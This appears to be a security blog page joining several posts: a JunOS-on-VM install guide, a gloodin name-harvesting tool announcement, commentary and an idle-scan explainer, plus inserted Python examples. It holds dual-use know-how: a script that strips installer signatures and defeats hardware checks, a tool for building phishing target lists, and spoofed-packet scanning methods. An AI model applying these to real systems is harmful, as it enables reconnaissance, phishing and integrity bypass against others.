    sysctl: unknown oid 'hw.re.model'
    
    sysctl: unknown oid 'hw.re.model'
    
    sysctl: unknown oid 'hw.re.model'
    
    WARNING:     This package will load JUNOS 9.6R1.13 software.
    
    WARNING:     It will save JUNOS configuration files, and SSH keys
    
    WARNING:     (if configured), but erase all other files and information
    
    WARNING:     stored on this machine.  It will attempt to preserve dumps
    
    WARNING:     and log files, but this can not be guaranteed.  This is the
    
    WARNING:     pre-installation stage and all the software is loaded when
    
    WARNING:     you reboot the system.
    
    Saving the config files ...
    
    Installing the bootstrap installer ...
    
    WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
    
    WARNING:     'request system reboot' command when software installation is
    
    WARNING:     complete. To abort the installation, do not reboot your system,
    
    WARNING:     instead use the 'request system software delete jinstall'
    
    WARNING:     command as soon as this operation completes.

    DO NOT REBOOT, Ensure you can interact with JunOS on the VM Console:

    # chmod +w /boot/loader.conf
    
    # vi /boot/loader.conf
    

    Add this line to the file:

    console="vidconsole"

    Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

     

    JunOS 10.4R1 and JunOS 11.1R1


    This process is the same for 10.x and 11.x. Unpack the different parts of the installer and remove hash files used to validate the installer:

    # cd /var/tmp/
    
    # mkdir jinst
    
    # cd jinst
    
    # tar xvzf ../jinstall-10.4R1.9-domestic-signed.tgz
    
    # rm *.md5 *.sha1 *.sig
    

    Open in vi the +INSTALL file

    # vi ./+INSTALL
    


    Modify the variable re_name in the check_arch_compatibility() function as shown below; inside vi you can type /check_arch<enter> to jump straight to it.

    check_arch_compatibility()
    
    {
    
        #re_name=`/sbin/sysctl -n hw.re.name 2>/dev/null`
    
        re_name='olive'
    
        if [ -z "$re_name" ]; then
    
            Error "hw.re.name sysctl not supported."
    
        fi
    


    Continue unpacking the next level of the package:


    # mkdir domestic
    
    # cd domestic/
    
    # tar xvzf ../jinstall-10.4R1.9-domestic.tgz

    Open with vi +INSTALL and +REQUIRE and modify the variable re_name in the check_arch_compatibility() as done before. Unpack the pkgtools.tgz file and make the checkpic file always return true:

    # mkdir pkgtools
    
    # cd pkgtools
    
    # tar xvzf ../pkgtools.tgz 
    
    # cp /usr/bin/true bin/checkpic 

    Repackage the installer:

    # tar cvzf ../pkgtools.tgz *
    
    # cd ..
    
    # rm -rf pkgtools
    
    # tar cvzf ../jinstall-10.4R1.9-domestic.tgz *
    
    # cd ..
    
    # rm -rf domestic
    
    # tar cvzf ../jinstall-10.4R1.9-domestic-signed.tgz *
    
    # cd ..
    
    # rm -rf jinst
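    The whole unpack, patch and repack dance above, automated, as an added example (my own script, not something Juniper or the original post provides). The nesting of the archives is taken from the commands above; the exact spacing of the re_name line inside +INSTALL is not shown in the post, so the script matches it loosely. Be clear about what it does: it throws away the package's .md5/.sha1/.sig files and makes the hardware checks always pass, which is fine for a lab VM and nothing else. The package the demo patches is a constructed stand-in with the same layout and no Juniper code in it.

```python
"""Added example (not part of the original post): the 10.x/11.x repackaging the
post does by hand, automated. Nesting is taken from the post's commands:
signed.tgz -> +INSTALL, *.md5/*.sha1/*.sig, jinstall-<ver>-domestic.tgz
           -> +INSTALL, +REQUIRE, pkgtools.tgz -> bin/checkpic.
The re_name line is matched loosely since its exact spacing is not shown. This
strips the signature files and disables the hardware checks: lab VMs only."""
import glob, io, os, re, shutil, tarfile, tempfile

RE_NAME_LINE = re.compile(r"^([ \t]*)re_name=`[^`\n]*hw\.re\.name[^`\n]*`[ \t]*$", re.M)
CHECKPIC_TRUE = b"#!/bin/sh\nexit 0\n"   # same effect as cp /usr/bin/true bin/checkpic

def patch_install_script(text: str, model: str = "olive") -> str:
    """Comment out the sysctl lookup and hard-code re_name, as the post edits by hand."""
    def fix(m):
        return f"{m.group(1)}#{m.group(0).strip()}\n{m.group(1)}re_name='{model}'"
    return RE_NAME_LINE.sub(fix, text)

def _read(path, mode="r"):
    with open(path, mode) as f:
        return f.read()

def _extract(tgz, dest):
    with tarfile.open(tgz, "r:gz") as t:
        try:
            t.extractall(dest, filter="data")    # Python >= 3.12 and backports
        except TypeError:
            t.extractall(dest)

def _pack(src_dir, tgz):
    with tarfile.open(tgz, "w:gz") as t:
        for name in sorted(os.listdir(src_dir)):
            t.add(os.path.join(src_dir, name), arcname=name)

def _patch_file(path, model):
    if os.path.exists(path):
        patched = patch_install_script(_read(path), model)
        with open(path, "w") as f:
            f.write(patched)

def patch_jinstall(signed_tgz, out_tgz, model="olive"):
    """Strip signatures, patch the arch check at both levels, neuter checkpic, repack."""
    work = tempfile.mkdtemp()
    try:
        outer, dom, tools = (os.path.join(work, n) for n in ("jinst", "domestic", "pkgtools"))
        _extract(signed_tgz, outer)
        for f in glob.glob(os.path.join(outer, "*")):
            if f.endswith((".md5", ".sha1", ".sig")):
                os.remove(f)
        _patch_file(os.path.join(outer, "+INSTALL"), model)
        inner_tgz = glob.glob(os.path.join(outer, "jinstall-*-domestic.tgz"))[0]
        _extract(inner_tgz, dom)
        for n in ("+INSTALL", "+REQUIRE"):
            _patch_file(os.path.join(dom, n), model)
        _extract(os.path.join(dom, "pkgtools.tgz"), tools)
        checkpic = os.path.join(tools, "bin", "checkpic")
        with open(checkpic, "wb") as f:
            f.write(CHECKPIC_TRUE)
        os.chmod(checkpic, 0o755)
        _pack(tools, os.path.join(dom, "pkgtools.tgz"))
        _pack(dom, inner_tgz)
        _pack(outer, out_tgz)
    finally:
        shutil.rmtree(work)

# --- constructed stand-in package (no Juniper code), same nesting as the real one ---
INSTALL_SNIPPET = (b"check_arch_compatibility()\n{\n"
                   b"    re_name=`/sbin/sysctl -n hw.re.name 2>/dev/null`\n"
                   b"    if [ -z \"$re_name\" ]; then\n"
                   b"        Error \"hw.re.name sysctl not supported.\"\n    fi\n}\n")

def _tgz_from_dict(tgz, files):
    with tarfile.open(tgz, "w:gz") as t:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o755
            t.addfile(info, io.BytesIO(data))
    return _read(tgz, "rb")

def build_demo_jinstall(directory, ver="10.4R1.9"):
    pk = _tgz_from_dict(os.path.join(directory, "pkgtools.tgz"),
                        {"bin/checkpic": b"#!/bin/sh\nexit 1\n"})    # fails, like on non-Juniper HW
    dm = _tgz_from_dict(os.path.join(directory, f"jinstall-{ver}-domestic.tgz"),
                        {"+INSTALL": INSTALL_SNIPPET, "+REQUIRE": INSTALL_SNIPPET, "pkgtools.tgz": pk})
    signed = os.path.join(directory, f"jinstall-{ver}-domestic-signed.tgz")
    _tgz_from_dict(signed, {"+INSTALL": INSTALL_SNIPPET, f"jinstall-{ver}-domestic.tgz": dm,
                            f"jinstall-{ver}-domestic.tgz.sig": b"sig", "jinstall.md5": b"md5"})
    return signed

def inspect_patched(tgz):
    """Read back the things that matter from a repacked bundle."""
    work = tempfile.mkdtemp()
    try:
        _extract(tgz, work)
        leftovers = [n for n in os.listdir(work) if n.endswith((".md5", ".sha1", ".sig"))]
        _extract(glob.glob(os.path.join(work, "jinstall-*-domestic.tgz"))[0], os.path.join(work, "d"))
        _extract(os.path.join(work, "d", "pkgtools.tgz"), os.path.join(work, "p"))
        return {"signature_files": leftovers,
                "outer_install": _read(os.path.join(work, "+INSTALL")),
                "inner_require": _read(os.path.join(work, "d", "+REQUIRE")),
                "checkpic": _read(os.path.join(work, "p", "bin", "checkpic"), "rb")}
    finally:
        shutil.rmtree(work)

def demo():
    d = tempfile.mkdtemp()
    out = os.path.join(d, "patched-signed.tgz")
    patch_jinstall(build_demo_jinstall(d), out)
    return inspect_patched(out)
```

    On the FreeBSD VM you would run patch_jinstall("jinstall-10.4R1.9-domestic-signed.tgz", "jinstall-10.4R1.9-domestic-signed.tgz") against the real file in /var/tmp and then proceed with pkg_add exactly as below; the demo only exists so the script can be exercised without Juniper software.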

    Install the package:

     # pkg_add jinstall-10.4R1.9-domestic-signed.tgz 
    
     Adding jinstall...
    
     sysctl: unknown oid 'hw.product.model'
    
     sysctl: unknown oid 'hw.re.model'
    
     sysctl: unknown oid 'hw.re.model'
    
     sysctl: unknown oid 'hw.re.model'
    
     WARNING:     This package will load JUNOS 10.4R1.9 software.
    
     WARNING:     It will save JUNOS configuration files, and SSH keys
    
     WARNING:     (if configured), but erase all other files and information
    
     WARNING:     stored on this machine.  It will attempt to preserve dumps
    
     WARNING:     and log files, but this can not be guaranteed.  This is the
    
     WARNING:     pre-installation stage and all the software is loaded when
    
     WARNING:     you reboot the system.
    
     Saving the config files ...
    
     Installing the bootstrap installer ...
    
     WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
    
     WARNING:     'request system reboot' command when software installation is
    
     WARNING:     complete. To abort the installation, do not reboot your system,
    
     WARNING:     instead use the 'request system software delete jinstall'
    
     WARNING:     command as soon as this operation completes.
    

    Ensure you can interact with JunOS on the VM Console, there is no need for this step with version 10.4 but recommended in case there is a change in any other 10.x package:

    # chmod +w /boot/loader.conf
    
    # vi /boot/loader.conf

    Add this line to the file:

    console="vidconsole"

    Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

    Initial Configuration


    On the console, log in as root and just press Enter at the password prompt (there is no root password yet; set one below before this VM goes near a shared network). Enter cli to start the JunOS command-line interface, then enter configuration mode:

    % cli
    
    > configure

    Set the hostname for the router:

    # set system host-name <router name>

    Set the root password:

    # set system root-authentication plain-text-password <enter>
    Create a secondary admin user to use for SSH:


    # set system login user <username> class super-user
    
    # set system login user <username> authentication plain-text-password <enter>
    Set an IP Address on the interface em0 so as to connect to the router:


    # set interfaces em0 unit 0 family inet address <ip/mask>
    Enable and set the SSH Version of the protocol to use to version 2:


    # set system services ssh protocol-version v2
    Enable Telnet and FTP. Both are cleartext protocols; they are convenient in a lab VM, but they are exactly what you would leave disabled when hardening a production router:


    # set system services telnet
    
    # set system services ftp
    Set the default gateway:


    # set routing-options static route 0.0.0.0/0 next-hop <Default Gateway IP>
    Set the DNS Server to use:


    # set system name-server <name server IP>
    Save the configuration:


    # commit
    To get full list of software installed and version without paging:


    > show version | no-more
    To get full configuration:


    > show configuration | no-more 
    To get full configuration in XML format:


    > show configuration | no-more | display xml

    Install the Web Interface


    Copy to the router the jweb file using scp and the secondary admin account created above:

    $ scp jweb-<version>-signed.tgz <username>@<ip>:/var/tmp
    SSH in to the router and run:


    > request system software add /var/tmp/jweb-<version>-signed.tgz
    After installer finishes execute a reboot of the router


    > request system reboot 
    
    Reboot the system ? [yes,no] (no) yes
    It will take a while for the router to reboot since it is setting up the files for the web interface. Once the router is back up, connect to it, enter configuration mode and enable the web management system on the interface you configured:


    # set system services web-management http interface em0.0
    
    # commit

    New and Improved gloodin!

    |


    Dennis Antunes is happy to announce the release of gloodin_v0.2

    This version features many improvements over the initial release. Most notably:
    • The option to specify output format: first dot last, first initial last, etc.,
    • Output file name
    • Text to append/prepend: think email address, which would dovetail nicely with SET's mass mailer functionality
    • Simple URL encoding so spaces, ampersands, no longer break my queries :)
    • Error handling
    • Basic help

    gloodin in a nutshell:

    gloodin is a python script that makes a large number of google queries along with the modifier "site:linkedin.com" to harvest thousands of potential employee names, going far beyond what a typical manual search would allow.

    It achieves this by repeatedly searching for some very common first names, last names and titles, later stripping these out to grab all the rest. These names/terms are easily configurable by editing the included searchterms.txt, which is read in at run time.

    For example, the following command will pull user names from the target organization; output them in a first initial dot last name format; append the email address of the target organization, and write the results out to the file gloodin_target_org:
    ./gloodin_v0.2 -t "target organization" -f fidl -a @target_org.com -o gloodin_target_org

    Please contact me with any questions, suggestions, bugs etc. at stratmofo at gmail dot com.
    Twitter: @dennisantunes
    Blog: http://securityjuggernaut.blogspot.com/

    The PaulDotCom team will be teaching Offensive Countermeasures at Black Hat July 30-31
    Should the payment information be stored in your SIM card (where carriers have access to it) or in an NFC (Near Field Communications) chip? This is scary: once your credit card is stored in your phone, mobile attacks will EXPLODE. This will be the new way for attackers to get CC info. Gone will be the days of planting devices in the store; attackers will instead attack your phone, or attack the carrier or mobile provider, to get credit cards. This is bad given that some stats I read say one in every two Americans will have a smartphone, which may even be more than the number of people with computers!

    We talked about this a few weeks ago. At the last RSA there was one reporter who sat in on a mobile security talk and came away with the feeling that security for mobile devices was not as bad as some people say it is. Shortly after, there was a slew of malware available for download on the Android Marketplace. There is just not much financial incentive for attackers to go after these devices yet. If we create a virtual wallet on them, it is going to end poorly. Further, we cannot lose sight of the fact that many applications are running as root and there is little to no built-in security for these devices. Sure, it may not be that bad now. But any student of information security history can see where this is going.
    Job Security! All Aboard!!!

    PaulDotCom and John Strand

    Originally discussed during episode 242

    John Strand will be teaching Offensive Countermeasures at Black Hat July 30-31

    This blog post is brought to you by SecureIdeas... Because Kevin Johnson paid me $1.

    PaulDotCom Security Weekly - Episode 242 - May 6th 2011


    Paul, Larry, and Carlos tell us how to use Nmap to perform stealthy host and service discovery on a network:

    Drunken security news style:

    Episode 242 Show Notes

    Episode 242 Direct Audio Download

    All the Pauldotcom Security Weekly episodes on our Bliptv archives.

    Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

    Audio Feeds:

    Please note that we're recording Episode 242 on Friday at 8PM this week!


    You can follow along and watch the show live via the link below:

    NOTE: The video will play the most recent show up until we are live!


    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 242 show notes page.

    - Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

    How to Hack a Cop Car



    Wicked Clown sent in an interesting article today.

    Look, this does not even count as "hacking." This is just too basic, too good to be true. However, there are some excellent points to be taken from this article. First, it shows how poor embedded device security can be. There is little to no security built into the systems that cops are using while on patrol.

    Junior Brown: proof that country music and The Highway Patrol can be awesome.

    Also, we have services with no user ID or password. And this is on an “important” system. Was there even a basic test of this while it was in development?

    There are just a couple of things that popped into my mind while reading this. First, this fits into the concept of "cyber-criminals" actually being nothing more than just criminals. Also, I could not help but think of the stickers, "This House is Protected By Smith & Wesson."

    I think cops could have a better sticker:

    This computer is protected by Glock

    John Strand will be teaching Offensive Countermeasures at Black Hat July 30-31

    PaulDotCom will be presenting the debut of our 2-day Offensive Countermeasures class at Black Hat July 30-31.

    Before we get into this too much please check out the following:
    http://en.wikipedia.org/wiki/OODA_loop

    The main issue with computer security and cyber-warfare today is that there is very little most organizations on our side are willing to do when it comes to taking any action against attackers. There are a number of good reasons for this, one being legal issues and collateral damage to intermediary systems. Another may be fear of angering the attackers. However, it is an aspect of computer security that needs to be addressed, and we need to move on. Current AV, firewall and IDS strategies are failing and will continue to fail.

    Long story short, if we have overly stringent rules and our opponents do not, who is going to win?

    We have to get inside an attacker’s OODA loop and change the dynamics in such a way they did not expect.

    Hence, offensive countermeasures should be considered. However, when we consider offensive countermeasures we need to get past the idea of "hacking back." PaulDotCom is running a class at Black Hat and we want people to understand that this class goes beyond getting access to an attacker’s machine. A class focused on "hacking back" would not sell well; there is little to no way you would be able to justify a class like that to management. Rather, Paul and I have been focusing on things that an organization can do that would make our lives as testers miserable. Consequently, the things we cover in this class will make an attacker’s life more miserable as well.

    We have broken the class up into three sections: Annoyance, Attribution, and Attack, or the three A's. The reason we have done this is that we want you to be able to bring the things you have learned back to work and feel comfortable implementing some of them without having to get buy-in from a lawyer. For example, Attribution: with Attribution we focus on how we can identify an attacker’s real IP address without "hacking" their system, even if they are coming through Tor. We will teach you how to do this using many of the same techniques used by almost all websites today. The point is, we do it without "hacking back."

    So, this class is dedicated to finding ways to fight back and making our networks "hard-targets" to attack. It is also dedicated to finding ways to get attribution on who the attackers are and where they are coming from.

    Finally, we want to illuminate the legal issues surrounding this topic. Time to fight FUD with fact. There is case law. Even the extreme example of "hacking back" has been done; it just requires a bit of research and finesse.

    This class has 7 labs per day. You will also leave the class with the OCM VM that will have all of the tools from the class ready to go.

    Can't wait to see you there.

    -strandjs
    PaulDotCom

    Idle scans let an attacker port-scan a victim while framing an idle third host (the "zombie") for it. The attacker never sends a packet to the victim from their own address; instead they measure, on the zombie, the side effect of the victim's response to a spoofed packet. Nmap currently implements the classic IP ID version of this with the -sI command line option.

    There is a very interesting paper out that discusses two new methods of performing idle scans. One of these methods can peer through a network firewall and scan devices on internal networks that are not directly reachable by the attacker. The paper is available for download here:
    http://people.csail.mit.edu/costan/readings/usenix_papers/Ensafi.pdf

    The paper introduces two new types of scan. The first is based on RESET rate limiting and works much like the IP ID technique Nmap uses today: a change in the ZOMBIE's observable behavior is caused by the VICTIM's response. The second uses changes in the ZOMBIE's "SYN cache" to scan hosts that are reachable from the ZOMBIE but not directly accessible to the attacker. Here is a brief explanation of how these two new scans work.

    NEW IDLE SCAN #1 - Reset Rate Limiting Scans
    Concept:
    FreeBSD limits the number of RESET packets it will send in a given period of time. For simplicity, let's say that FreeBSD will only send one RESET per second. If I send that host a packet that should elicit a RESET and the expected RESET does not come back, then I know it sent someone else a RESET in the same second and hit its RESET limit. So if we find an idle FreeBSD host on the net with rate limiting turned on, we can scan a third-party victim using this behavior.

    Overview of the scan technique:
    1) Attacker spoofs the ZOMBIE's IP in a SYN packet to the VICTIM
    2) Attacker sends a SYN-ACK to the ZOMBIE
    3) If the attacker gets a RST back, the port was CLOSED. If the attacker gets nothing back, the port was OPEN.

    To understand how this works, let's look at an open-port and a closed-port scenario. In this case the ZOMBIE is any idle FreeBSD host on the internet with RESET rate limiting enabled.

    Consider the following Open Port scenario:
    1) Attacker sends a spoofed SYN packet from the ZOMBIE to the VICTIM with the destination port he wants to scan
    2) Since the port is open, the VICTIM sends a SYN-ACK to the ZOMBIE
    3) The ZOMBIE wasn't expecting the packet, so it sends a RESET to the VICTIM and starts its RST rate-limiting timer, preventing any further RESET packets
    4) The attacker sends a SYN-ACK from their real IP to the ZOMBIE. Since the ZOMBIE never sent a SYN to the attacker, the ZOMBIE should send a RESET back, but because of the rate limit it does not and we get nothing back. (The probe has to land inside the same rate-limit window as step 3, which is why the ZOMBIE must truly be idle: any other traffic drawing RESETs from it looks like an open port.)

    Here is the scenario for a closed port:
    With a closed port the VICTIM will not respond with a SYN-ACK. It will send a RESET, which will NOT cause the ZOMBIE to send a RESET.
    1) Attacker sends a spoofed SYN packet from the ZOMBIE to the VICTIM
    2) Since the port is CLOSED, the VICTIM sends a RESET to the ZOMBIE
    3) The ZOMBIE silently drops the RESET from the VICTIM, so its RST rate limit is unaffected and the ZOMBIE can still respond to us with a RESET
    4) The attacker sends a SYN-ACK from their REAL IP to the ZOMBIE and gets a RESET back.

    NEW IDLE SCAN #2 - SYN Cache Scans
    This scan is based on the fact that some modern TCP stacks will send SYN cookies once their HALF-OPEN connection queue is full. Two things make it very different from other IDLE scans. 1) We are not spoofing packets from the ZOMBIE and sending them to the VICTIM, as traditional IDLE scan methods do. Instead, we are spoofing packets from the VICTIM and sending them to the ZOMBIE. This leads to a VERY interesting second difference. 2) We NEVER transmit a packet to the VICTIM, not even spoofed packets! So the attacker doesn't have to be able to ROUTE to the VICTIM, as long as the ZOMBIE can. This means you could potentially use a firewall or other network device as the ZOMBIE to scan devices on the DMZ or other internal networks that are not accessible to the attacker. Here is a high-level overview of how it is supposed to work:

    Overview:
    1) Spoof the VICTIM and send a SYN to the ZOMBIE, using as the source port the port you want to scan on the VICTIM*
    *Note: traditional IDLE scans send the packets to the VICTIM from the ZOMBIE
    2) Send a SYN to the ZOMBIE from your real address
    3) If you get a SYN cookie back from the ZOMBIE, the port on the VICTIM was open. If you get a normal SYN-ACK back, the port on the VICTIM was closed.

    Consider the following Open Port scenario:
    1) Attacker spoofs the VICTIM's IP, sending a SYN packet to the ZOMBIE
    2) The ZOMBIE sends a SYN-ACK to the VICTIM, exhausting its HALF-OPEN connection queue and causing it to use SYN cookies for any additional connection requests (pretend it has a connection queue of 1 for simplicity)
    3) The attacker sends a SYN to the ZOMBIE from his real IP address
    4) Since the connection queue is full, the ZOMBIE sends a SYN cookie
    5) The attacker determines it is a SYN cookie and not a regular SYN-ACK based upon the fact that SYN cookies have statistical anomalies in their initial sequence numbers and are never retransmitted (the ZOMBIE keeps no state from which to retransmit)

    Closed Port:
    1) Attacker spoofs the VICTIM's IP, sending a SYN packet to the ZOMBIE
    2) The ZOMBIE sends a SYN-ACK to the VICTIM, exhausting its HALF-OPEN connection queue and causing it to use SYN cookies for any additional connection requests
    3) The VICTIM sends a RST to the ZOMBIE, causing the ZOMBIE to remove the entry from its half-open connection queue. Since the queue is no longer full, the ZOMBIE will respond to future requests with normal SYN-ACKs and not SYN cookies
    4) The attacker sends a SYN to the ZOMBIE from his own IP address
    5) Since the connection queue is not full, the ZOMBIE sends a normal SYN-ACK
    6) The attacker determines it is a normal SYN-ACK and knows the port is CLOSED

    Of course there is more to it than I try to explain here. But the paper is definitely worth a read so check it out!
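    As an added example, not code from the post or from the paper, here is a small Python model of the two scans described above, so each inference step can be checked against the packets that actually flow. The ZOMBIE and VICTIM behave exactly as the post describes them: a FreeBSD-like RST rate limit (simplified here to one RST per interval) and a half-open queue of one entry that falls back to SYN cookies when full. The addresses, port numbers and queue sizes are assumptions made for the example, and the VICTIM's reaction to an unsolicited SYN-ACK (RST from a closed port, silence from an open one) is taken from the post's description of the SYN-cache scan; real stacks differ in detail and the paper is the reference.

```python
"""Added example, not the post's or the paper's code: a toy model of the two
idle scans described above.  The ZOMBIE and VICTIM behave exactly as the post
describes them (a FreeBSD-like RST rate limit, here one RST per interval, and
a half-open queue of one entry that falls back to SYN cookies when full).
Addresses, ports and queue sizes are assumptions made for the example."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    src: str
    dst: str
    sport: int
    dport: int
    flags: str            # "S", "SA" or "R"
    cookie: bool = False  # the SYN-ACK was a stateless SYN cookie


class Stack:
    """Minimal TCP stack with just the behaviours the two scans depend on."""
    def __init__(self, ip, open_ports=(), rst_limit=None, syn_queue=None):
        self.ip = ip
        self.open_ports = set(open_ports)
        self.rst_limit = rst_limit   # RSTs allowed per interval; None = unlimited
        self.rst_sent = 0
        self.syn_queue = syn_queue   # half-open queue size; None = never fills
        self.half_open = set()       # (peer ip, peer port, local port)

    def new_interval(self):
        """The rate-limit timer expires and the RST budget is refilled."""
        self.rst_sent = 0

    def _rst(self, p):
        if self.rst_limit is not None and self.rst_sent >= self.rst_limit:
            return None              # budget spent: the RST is silently suppressed
        self.rst_sent += 1
        return Pkt(self.ip, p.src, p.dport, p.sport, "R")

    def receive(self, p):
        key = (p.src, p.sport, p.dport)
        if p.flags == "S":
            if p.dport not in self.open_ports:
                return self._rst(p)  # SYN to a closed port draws a RST
            if self.syn_queue is not None and len(self.half_open) >= self.syn_queue:
                return Pkt(self.ip, p.src, p.dport, p.sport, "SA", cookie=True)
            self.half_open.add(key)  # ordinary SYN-ACK, entry kept in the queue
            return Pkt(self.ip, p.src, p.dport, p.sport, "SA")
        if p.flags == "SA":
            # Unsolicited SYN-ACK: a closed port answers with a RST, an open port
            # stays silent.  The latter is the VICTIM behaviour the post's
            # SYN-cache scan assumes; real stacks differ, see the paper.
            return None if p.dport in self.open_ports else self._rst(p)
        self.half_open.discard(key)  # an inbound RST frees the half-open entry
        return None


def deliver(hosts, p):
    """Hand a packet to its destination stack and return the reply, if any."""
    return hosts[p.dst].receive(p) if p is not None else None


def rst_limit_scan(hosts, attacker, zombie, victim, port, zombie_port=31337):
    """New idle scan #1.  zombie_port is closed on the ZOMBIE, so the VICTIM's
    SYN-ACK (open case) is answered with a RST that spends the budget."""
    hosts[zombie].new_interval()
    # 1) SYN spoofed from the ZOMBIE to VICTIM:port
    to_zombie = deliver(hosts, Pkt(zombie, victim, zombie_port, port, "S"))
    # 2) the VICTIM's answer (SYN-ACK if open, RST if closed) reaches the ZOMBIE;
    #    whatever the ZOMBIE sends in return goes back to the VICTIM
    deliver(hosts, deliver(hosts, to_zombie))
    # 3) probe from the attacker's real address: no RST means the budget is gone
    probe = deliver(hosts, Pkt(attacker, zombie, 40000, zombie_port, "SA"))
    return "open" if probe is None else "closed"


def syn_cache_scan(hosts, attacker, zombie, victim, port, zombie_port=80):
    """New idle scan #2.  The attacker never sends anything to the VICTIM; only
    the ZOMBIE has to reach it.  zombie_port is open on the ZOMBIE."""
    hosts[zombie].half_open.clear()  # entries from earlier probes have timed out
    # 1) SYN spoofed from VICTIM:port to ZOMBIE:zombie_port
    to_victim = deliver(hosts, Pkt(victim, zombie, port, zombie_port, "S"))
    # 2) the ZOMBIE's SYN-ACK reaches the VICTIM; a closed port RSTs it and the
    #    ZOMBIE frees the entry, an open port leaves the queue full
    deliver(hosts, deliver(hosts, to_victim))
    # 3) probe SYN from the attacker's real address
    probe = deliver(hosts, Pkt(attacker, zombie, 40001, zombie_port, "S"))
    # 4) a SYN cookie means the queue was still full: the VICTIM's port is open
    return "open" if probe.cookie else "closed"


def demo():
    hosts = {
        "zombie": Stack("zombie", open_ports={80}, rst_limit=1, syn_queue=1),
        "victim": Stack("victim", open_ports={22}),   # only 22 is open
    }
    def both(scan):
        return {p: scan(hosts, "attacker", "zombie", "victim", p) for p in (22, 23)}
    return {"rst_limit": both(rst_limit_scan), "syn_cache": both(syn_cache_scan)}


if __name__ == "__main__":
    print(demo())
```

    demo() reports port 22 open and port 23 closed from both scans. Two things the model makes visible: scan #1 only works if the attacker's probe lands inside the same rate-limit interval as the ZOMBIE's RST to the VICTIM, so any other traffic drawing RSTs from the ZOMBIE produces false "open" results; and scan #2 rests entirely on how the VICTIM treats an unsolicited SYN-ACK, which is why the paper, not this toy, is the place to check which stacks qualify as VICTIM and ZOMBIE.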

    Join me for SANS 560 vLive!! Monday - September 12, 2011 - Wednesday - October 19, 2011 Register Today!